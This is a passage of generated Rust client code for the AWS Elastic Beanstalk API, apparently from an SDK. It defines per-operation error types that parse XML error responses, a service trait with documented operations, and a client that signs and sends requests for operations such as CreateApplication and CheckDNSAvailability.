{ _ => UpdateApplicationError::Unknown(String::from(body)) } }, Err(_) => UpdateApplicationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateApplicationError { fn from(err: XmlParseError) -> UpdateApplicationError { let XmlParseError(message) = err; UpdateApplicationError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateApplicationError { fn from(err: CredentialsError) -> UpdateApplicationError { UpdateApplicationError::Credentials(err) } } impl From<HttpDispatchError> for UpdateApplicationError { fn from(err: HttpDispatchError) -> UpdateApplicationError { UpdateApplicationError::HttpDispatch(err) } } impl fmt::Display for UpdateApplicationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateApplicationError { fn description(&self) -> &str { match *self { UpdateApplicationError::Validation(ref cause) => cause, UpdateApplicationError::Credentials(ref err) => err.description(), UpdateApplicationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateApplicationError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateApplicationResourceLifecycle #[derive(Debug, PartialEq)] pub enum UpdateApplicationResourceLifecycleError { ///<p>The specified account does not have sufficient privileges for one or more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateApplicationResourceLifecycleError { pub fn from_body(body: &str) -> UpdateApplicationResourceLifecycleError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => UpdateApplicationResourceLifecycleError::InsufficientPrivileges(String::from(parsed_error.message)),_ => UpdateApplicationResourceLifecycleError::Unknown(String::from(body)) } }, Err(_) => UpdateApplicationResourceLifecycleError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateApplicationResourceLifecycleError { fn from(err: XmlParseError) -> UpdateApplicationResourceLifecycleError { let XmlParseError(message) = err; UpdateApplicationResourceLifecycleError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateApplicationResourceLifecycleError { fn from(err: CredentialsError) -> UpdateApplicationResourceLifecycleError { UpdateApplicationResourceLifecycleError::Credentials(err) } } impl From<HttpDispatchError> for UpdateApplicationResourceLifecycleError { fn from(err: HttpDispatchError) -> UpdateApplicationResourceLifecycleError { UpdateApplicationResourceLifecycleError::HttpDispatch(err) } } impl fmt::Display for UpdateApplicationResourceLifecycleError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateApplicationResourceLifecycleError { fn description(&self) -> &str { match *self { UpdateApplicationResourceLifecycleError::InsufficientPrivileges(ref cause) => cause, UpdateApplicationResourceLifecycleError::Validation(ref cause) => cause, UpdateApplicationResourceLifecycleError::Credentials(ref err) => err.description(), UpdateApplicationResourceLifecycleError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateApplicationResourceLifecycleError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateApplicationVersion #[derive(Debug, PartialEq)] pub enum UpdateApplicationVersionError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateApplicationVersionError { pub fn from_body(body: &str) -> UpdateApplicationVersionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ _ => UpdateApplicationVersionError::Unknown(String::from(body)) } }, Err(_) => UpdateApplicationVersionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateApplicationVersionError { fn from(err: XmlParseError) -> UpdateApplicationVersionError { let XmlParseError(message) = err; UpdateApplicationVersionError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateApplicationVersionError { fn from(err: CredentialsError) -> UpdateApplicationVersionError { UpdateApplicationVersionError::Credentials(err) } } impl From<HttpDispatchError> for UpdateApplicationVersionError { fn from(err: HttpDispatchError) -> UpdateApplicationVersionError { UpdateApplicationVersionError::HttpDispatch(err) } } impl fmt::Display for UpdateApplicationVersionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateApplicationVersionError { fn description(&self) -> &str { match *self { UpdateApplicationVersionError::Validation(ref cause) => cause, UpdateApplicationVersionError::Credentials(ref err) => err.description(), UpdateApplicationVersionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateApplicationVersionError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateConfigurationTemplate #[derive(Debug, PartialEq)] pub enum UpdateConfigurationTemplateError { ///<p>The specified account does not have sufficient privileges for one or more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateConfigurationTemplateError { pub fn from_body(body: &str) -> UpdateConfigurationTemplateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => UpdateConfigurationTemplateError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => UpdateConfigurationTemplateError::TooManyBuckets(String::from(parsed_error.message)),_ => UpdateConfigurationTemplateError::Unknown(String::from(body)) } }, Err(_) => UpdateConfigurationTemplateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateConfigurationTemplateError { fn from(err: XmlParseError) -> UpdateConfigurationTemplateError { let XmlParseError(message) = err; UpdateConfigurationTemplateError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateConfigurationTemplateError { fn from(err: CredentialsError) -> UpdateConfigurationTemplateError { UpdateConfigurationTemplateError::Credentials(err) } } impl From<HttpDispatchError> for UpdateConfigurationTemplateError { fn from(err: HttpDispatchError) -> UpdateConfigurationTemplateError { UpdateConfigurationTemplateError::HttpDispatch(err) } } impl fmt::Display for UpdateConfigurationTemplateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateConfigurationTemplateError { fn description(&self) -> &str { match *self { UpdateConfigurationTemplateError::InsufficientPrivileges(ref cause) => cause, UpdateConfigurationTemplateError::TooManyBuckets(ref cause) => cause, UpdateConfigurationTemplateError::Validation(ref cause) => cause, UpdateConfigurationTemplateError::Credentials(ref err) => err.description(), UpdateConfigurationTemplateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateConfigurationTemplateError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateEnvironment #[derive(Debug, PartialEq)] pub enum UpdateEnvironmentError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateEnvironmentError { pub fn from_body(body: &str) -> UpdateEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => UpdateEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => UpdateEnvironmentError::TooManyBuckets(String::from(parsed_error.message)),_ => UpdateEnvironmentError::Unknown(String::from(body)) } }, Err(_) => UpdateEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateEnvironmentError { fn from(err: XmlParseError) -> UpdateEnvironmentError { let XmlParseError(message) = err; UpdateEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateEnvironmentError { fn from(err: CredentialsError) -> UpdateEnvironmentError { UpdateEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for UpdateEnvironmentError { fn from(err: HttpDispatchError) -> UpdateEnvironmentError { UpdateEnvironmentError::HttpDispatch(err) } } impl fmt::Display for UpdateEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateEnvironmentError { fn description(&self) -> &str { match *self { UpdateEnvironmentError::InsufficientPrivileges(ref cause) => cause, UpdateEnvironmentError::TooManyBuckets(ref cause) => cause, UpdateEnvironmentError::Validation(ref cause) => cause, UpdateEnvironmentError::Credentials(ref err) => err.description(), UpdateEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by ValidateConfigurationSettings #[derive(Debug, PartialEq)] pub enum ValidateConfigurationSettingsError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl ValidateConfigurationSettingsError { pub fn from_body(body: &str) -> ValidateConfigurationSettingsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => ValidateConfigurationSettingsError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => ValidateConfigurationSettingsError::TooManyBuckets(String::from(parsed_error.message)),_ => ValidateConfigurationSettingsError::Unknown(String::from(body)) } }, Err(_) => ValidateConfigurationSettingsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ValidateConfigurationSettingsError { fn from(err: XmlParseError) -> ValidateConfigurationSettingsError { let XmlParseError(message) = err; ValidateConfigurationSettingsError::Unknown(message.to_string()) } } impl From<CredentialsError> for ValidateConfigurationSettingsError { fn from(err: CredentialsError) -> ValidateConfigurationSettingsError { ValidateConfigurationSettingsError::Credentials(err) } } impl From<HttpDispatchError> for ValidateConfigurationSettingsError { fn from(err: HttpDispatchError) -> ValidateConfigurationSettingsError { ValidateConfigurationSettingsError::HttpDispatch(err) } } impl fmt::Display for ValidateConfigurationSettingsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ValidateConfigurationSettingsError { fn description(&self) -> &str { match *self { ValidateConfigurationSettingsError::InsufficientPrivileges(ref cause) => cause, ValidateConfigurationSettingsError::TooManyBuckets(ref cause) => cause, ValidateConfigurationSettingsError::Validation(ref cause) => cause, ValidateConfigurationSettingsError::Credentials(ref err) => err.description(), ValidateConfigurationSettingsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ValidateConfigurationSettingsError::Unknown(ref cause) => cause } } } /// Trait representing the capabilities of the Elastic Beanstalk API. Elastic Beanstalk clients implement this trait. pub trait ElasticBeanstalk { #[doc="<p>Cancels in-progress environment configuration update or application version deployment.</p>"] fn abort_environment_update(&self, input: &AbortEnvironmentUpdateMessage) -> Result<(), AbortEnvironmentUpdateError>; #[doc="<p>Applies a scheduled managed action immediately. A managed action can be applied only if its status is <code>Scheduled</code>. Get the status and action ID of a managed action with <a>DescribeEnvironmentManagedActions</a>.</p>"] fn apply_environment_managed_action(&self, input: &ApplyEnvironmentManagedActionRequest) -> Result<ApplyEnvironmentManagedActionResult, ApplyEnvironmentManagedActionError>; #[doc="<p>Checks if the specified CNAME is available.</p>"] fn check_dns_availability(&self, input: &CheckDNSAvailabilityMessage) -> Result<CheckDNSAvailabilityResultMessage, CheckDNSAvailabilityError>; #[doc="<p>Create or update a group of environments that each run a separate component of a single application. Takes a list of version labels that specify application source bundles for each of the environments to create or update. The name of each environment and other required information must be included in the source bundles in an environment manifest named <code>env.yaml</code>. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-mgmt-compose.html\">Compose Environments</a> for details.</p>"] fn compose_environments(&self, input: &ComposeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, ComposeEnvironmentsError>; #[doc="<p> Creates an application that has one configuration template named <code>default</code> and no application versions. 
</p>"] fn create_application(&self, input: &CreateApplicationMessage) -> Result<ApplicationDescriptionMessage, CreateApplicationError>; #[doc="<p>Creates an application version for the specified application. You can create an application version from a source bundle in Amazon S3, a commit in AWS CodeCommit, or the output of an AWS CodeBuild build as follows:</p> <p>Specify a commit in an AWS CodeCommit repository with <code>SourceBuildInformation</code>.</p> <p>Specify a build in an AWS CodeBuild with <code>SourceBuildInformation</code> and <code>BuildConfiguration</code>.</p> <p>Specify a source bundle in S3 with <code>SourceBundle</code> </p> <p>Omit both <code>SourceBuildInformation</code> and <code>SourceBundle</code> to use the default sample application.</p> <note> <p>Once you create an application version with a specified Amazon S3 bucket and key location, you cannot change that Amazon S3 location. If you change the Amazon S3 location, you receive an exception when you attempt to launch an environment from the application version.</p> </note>"] fn create_application_version(&self, input: &CreateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, CreateApplicationVersionError>; #[doc="<p>Creates a configuration template. Templates are associated with a specific application and are used to deploy different versions of the application with the same configuration settings.</p> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> <li> <p> <a>DescribeConfigurationSettings</a> </p> </li> <li> <p> <a>ListAvailableSolutionStacks</a> </p> </li> </ul>"] fn create_configuration_template(&self, input: &CreateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, CreateConfigurationTemplateError>; #[doc="<p>Launches an environment for the specified application using the specified configuration.</p>"] fn create_environment(&self, input: &CreateEnvironmentMessage) -> Result<EnvironmentDescription, CreateEnvironmentError>; #[doc="<p>Creates the Amazon S3 storage location for the account.</p> <p>This location is used to store user log files.</p>"] fn create_storage_location(&self) -> Result<CreateStorageLocationResultMessage, CreateStorageLocationError>; #[doc="<p>Deletes the specified application along with all associated versions and configurations. The application versions will not be deleted from your Amazon S3 bucket.</p> <note> <p>You cannot delete an application that has a running environment.</p> </note>"] fn delete_application(&self, input: &DeleteApplicationMessage) -> Result<(), DeleteApplicationError>; #[doc="<p>Deletes the specified version from the specified application.</p> <note> <p>You cannot delete an application version that is associated with a running environment.</p> </note>"] fn delete_application_version(&self, input: &DeleteApplicationVersionMessage) -> Result<(), DeleteApplicationVersionError>; #[doc="<p>Deletes the specified configuration template.</p> <note> <p>When you launch an environment using a configuration template, the environment gets a copy of the template. You can delete or modify the environment's copy of the template without affecting the running environment.</p> </note>"] fn delete_configuration_template(&self, input: &DeleteConfigurationTemplateMessage) -> Result<(), DeleteConfigurationTemplateError>; #[doc="<p>Deletes the draft configuration associated with the running environment.</p> <p>Updating a running environment with any configuration changes creates a draft configuration set. 
You can get the draft configuration using <a>DescribeConfigurationSettings</a> while the update is in progress or if the update fails. The <code>DeploymentStatus</code> for the draft configuration indicates whether the deployment is in process or has failed. The draft configuration remains in existence until it is deleted with this action.</p>"] fn delete_environment_configuration(&self, input: &DeleteEnvironmentConfigurationMessage) -> Result<(), DeleteEnvironmentConfigurationError>; #[doc="<p>Retrieve a list of application versions.</p>"] fn describe_application_versions(&self, input: &DescribeApplicationVersionsMessage) -> Result<ApplicationVersionDescriptionsMessage, DescribeApplicationVersionsError>; #[doc="<p>Returns the descriptions of existing applications.</p>"] fn describe_applications(&self, input: &DescribeApplicationsMessage) -> Result<ApplicationDescriptionsMessage, DescribeApplicationsError>; #[doc="<p>Describes the configuration options that are used in a particular configuration template or environment, or that a specified solution stack defines. The description includes the values of the options, their default values, and an indication of the required action on a running environment if an option value is changed.</p>"] fn describe_configuration_options(&self, input: &DescribeConfigurationOptionsMessage) -> Result<ConfigurationOptionsDescription, DescribeConfigurationOptionsError>; #[doc="<p>Returns a description of the settings for the specified configuration set, that is, either a configuration template or the configuration set associated with a running environment.</p> <p>When describing the settings for the configuration set associated with a running environment, it is possible to receive two sets of setting descriptions. One is the deployed configuration set, and the other is a draft configuration of an environment that is either in the process of deployment or that failed to deploy.</p> <p>Related Topics</p> <ul> <li> <p> <a>DeleteEnvironmentConfiguration</a> </p> </li> </ul>"] fn describe_configuration_settings(&self, input: &DescribeConfigurationSettingsMessage) -> Result<ConfigurationSettingsDescriptions, DescribeConfigurationSettingsError>; #[doc="<p>Returns information about the overall health of the specified environment. 
The <b>DescribeEnvironmentHealth</b> operation is only available with AWS Elastic Beanstalk Enhanced Health.</p>"] fn describe_environment_health(&self, input: &DescribeEnvironmentHealthRequest) -> Result<DescribeEnvironmentHealthResult, DescribeEnvironmentHealthError>; #[doc="<p>Lists an environment's completed and failed managed actions.</p>"] fn describe_environment_managed_action_history(&self, input: &DescribeEnvironmentManagedActionHistoryRequest) -> Result<DescribeEnvironmentManagedActionHistoryResult, DescribeEnvironmentManagedActionHistoryError>; #[doc="<p>Lists an environment's upcoming and in-progress managed actions.</p>"] fn describe_environment_managed_actions(&self, input: &DescribeEnvironmentManagedActionsRequest) -> Result<DescribeEnvironmentManagedActionsResult, DescribeEnvironmentManagedActionsError>; #[doc="<p>Returns AWS resources for this environment.</p>"] fn describe_environment_resources(&self, input: &DescribeEnvironmentResourcesMessage) -> Result<EnvironmentResourceDescriptionsMessage, DescribeEnvironmentResourcesError>; #[doc="<p>Returns descriptions for existing environments.</p>"] fn describe_environments(&self, input: &DescribeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, DescribeEnvironmentsError>; #[doc="<p>Returns a list of event descriptions matching criteria up to the last 6 weeks.</p> <note> <p>This action returns the most recent 1,000 events from the specified <code>NextToken</code>.</p> </note>"] fn describe_events(&self, input: &DescribeEventsMessage) -> Result<EventDescriptionsMessage, DescribeEventsError>; #[doc="<p>Retrieves detailed information about the health of instances in your AWS Elastic Beanstalk environment. This operation requires <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced.html\">enhanced health reporting</a>.</p>"] fn describe_instances_health(&self, input: &DescribeInstancesHealthRequest) -> Result<DescribeInstancesHealthResult, DescribeInstancesHealthError>; #[doc="<p>Returns a list of the available solution stack names.</p>"] fn list_available_solution_stacks(&self) -> Result<ListAvailableSolutionStacksResultMessage, ListAvailableSolutionStacksError>; #[doc="<p>Deletes and recreates all of the AWS resources (for example: the Auto Scaling group, load balancer, etc.) for a specified environment and forces a restart.</p>"] fn rebuild_environment(&self, input: &RebuildEnvironmentMessage) -> Result<(), RebuildEnvironmentError>; #[doc="<p>Initiates a request to compile the specified type of information of the deployed environment.</p> <p> Setting the <code>InfoType</code> to <code>tail</code> compiles the last lines from the application server log files of every Amazon EC2 instance in your environment. </p> <p> Setting the <code>InfoType</code> to <code>bundle</code> compresses the application server log files for every Amazon EC2 instance into a <code>.zip</code> file. Legacy and .NET containers do not support bundle logs. </p> <p> Use <a>RetrieveEnvironmentInfo</a> to obtain the set of logs. 
</p> <p>Related Topics</p> <ul> <li> <p> <a>RetrieveEnvironmentInfo</a> </p> </li> </ul>"] fn request_environment_info(&self, input: &RequestEnvironmentInfoMessage) -> Result<(), RequestEnvironmentInfoError>; #[doc="<p>Causes the environment to restart the application container server running on each Amazon EC2 instance.</p>"] fn restart_app_server(&self, input: &RestartAppServerMessage) -> Result<(), RestartAppServerError>; #[doc="<p>Retrieves the compiled information from a <a>RequestEnvironmentInfo</a> request.</p> <p>Related Topics</p> <ul> <li> <p> <a>RequestEnvironmentInfo</a> </p> </li> </ul>"] fn retrieve_environment_info(&self, input: &RetrieveEnvironmentInfoMessage) -> Result<RetrieveEnvironmentInfoResultMessage, RetrieveEnvironmentInfoError>; #[doc="<p>Swaps the CNAMEs of two environments.</p>"] fn swap_environment_cnam_es(&self, input: &SwapEnvironmentCNAMEsMessage) -> Result<(), SwapEnvironmentCNAMEsError>; #[doc="<p>Terminates the specified environment.</p>"] fn terminate_environment(&self, input: &TerminateEnvironmentMessage) -> Result<EnvironmentDescription, TerminateEnvironmentError>; #[doc="<p>Updates the specified application to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. To clear these properties, specify an empty string.</p> </note>"] fn update_application(&self, input: &UpdateApplicationMessage) -> Result<ApplicationDescriptionMessage, UpdateApplicationError>; #[doc="<p>Modifies lifecycle settings for an application.</p>"] fn update_application_resource_lifecycle(&self, input: &UpdateApplicationResourceLifecycleMessage) -> Result<ApplicationResourceLifecycleDescriptionMessage, UpdateApplicationResourceLifecycleError>; #[doc="<p>Updates the specified application version to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. To clear properties, specify an empty string.</p> </note>"] fn update_application_version(&self, input: &UpdateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, UpdateApplicationVersionError>; #[doc="<p>Updates the specified configuration template to have the specified properties or configuration option values.</p> <note> <p>If a property (for example, <code>ApplicationName</code>) is not provided, its value remains unchanged. To clear such properties, specify an empty string.</p> </note> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> </ul>"] fn update_configuration_template(&self, input: &UpdateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, UpdateConfigurationTemplateError>; #[doc="<p>Updates the environment description, deploys a new application version, updates the configuration settings to an entirely new configuration template, or updates select configuration option values in the running environment.</p> <p> Attempting to update both the release and configuration is not allowed and AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. </p> <p> When updating the configuration settings to a new template or individual settings, a draft configuration is created and <a>DescribeConfigurationSettings</a> for this environment returns two setting descriptions with different <code>DeploymentStatus</code> values. 
</p>"] fn update_environment(&self, input: &UpdateEnvironmentMessage) -> Result<EnvironmentDescription, UpdateEnvironmentError>; #[doc="<p>Takes a set of configuration settings and either a configuration template or environment, and determines whether those values are valid.</p> <p>This action returns a list of messages indicating any errors or warnings associated with the selection of option values.</p>"] fn validate_configuration_settings(&self, input: &ValidateConfigurationSettingsMessage) -> Result<ConfigurationSettingsValidationMessages, ValidateConfigurationSettingsError>; } /// A client for the Elastic Beanstalk API. pub struct ElasticBeanstalkClient<P, D> where P: ProvideAwsCredentials, D: DispatchSignedRequest { credentials_provider: P, region: region::Region, dispatcher: D, } impl<P, D> ElasticBeanstalkClient<P, D> where P: ProvideAwsCredentials, D: DispatchSignedRequest { pub fn new(request_dispatcher: D, credentials_provider: P, region: region::Region) -> Self { ElasticBeanstalkClient { credentials_provider: credentials_provider, region: region, dispatcher: request_dispatcher } } } impl<P, D> ElasticBeanstalk for ElasticBeanstalkClient<P, D> where P: ProvideAwsCredentials, D: DispatchSignedRequest { #[doc="<p>Cancels in-progress environment configuration update or application version deployment.</p>"] fn abort_environment_update(&self, input: &AbortEnvironmentUpdateMessage) -> Result<(), AbortEnvironmentUpdateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "AbortEnvironmentUpdate"); params.put("Version", "2010-12-01"); AbortEnvironmentUpdateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(AbortEnvironmentUpdateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Applies a scheduled managed action immediately. A managed action can be applied only if its status is <code>Scheduled</code>. 
Get the status and action ID of a managed action with <a>DescribeEnvironmentManagedActions</a>.</p>"] fn apply_environment_managed_action(&self, input: &ApplyEnvironmentManagedActionRequest) -> Result<ApplyEnvironmentManagedActionResult, ApplyEnvironmentManagedActionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ApplyEnvironmentManagedAction"); params.put("Version", "2010-12-01"); ApplyEnvironmentManagedActionRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplyEnvironmentManagedActionResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplyEnvironmentManagedActionResultDeserializer::deserialize("ApplyEnvironmentManagedActionResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ApplyEnvironmentManagedActionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Checks if the specified CNAME is available.</p>"] fn check_dns_availability(&self, input: &CheckDNSAvailabilityMessage) -> Result<CheckDNSAvailabilityResultMessage, CheckDNSAvailabilityError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CheckDNSAvailability"); params.put("Version", "2010-12-01"); CheckDNSAvailabilityMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = CheckDNSAvailabilityResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(CheckDNSAvailabilityResultMessageDeserializer::deserialize("CheckDNSAvailabilityResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CheckDNSAvailabilityError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Create or update a group of environments that each run a separate component of a single application. Takes a list of version labels that specify application source bundles for each of the environments to create or update. The name of each environment and other required information must be included in the source bundles in an environment manifest named <code>env.yaml</code>. 
See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-mgmt-compose.html\">Compose Environments</a> for details.</p>"] fn compose_environments(&self, input: &ComposeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, ComposeEnvironmentsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ComposeEnvironments"); params.put("Version", "2010-12-01"); ComposeEnvironmentsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionsMessageDeserializer::deserialize("ComposeEnvironmentsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ComposeEnvironmentsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p> Creates an application that has one configuration template named <code>default</code> and no application versions. </p>"] fn create_application(&self, input: &CreateApplicationMessage) -> Result<ApplicationDescriptionMessage, CreateApplicationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateApplication"); params.put("Version", "2010-12-01"); CreateApplicationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationDescriptionMessageDeserializer::deserialize("CreateApplicationResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateApplicationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Creates an application version for the specified application. 
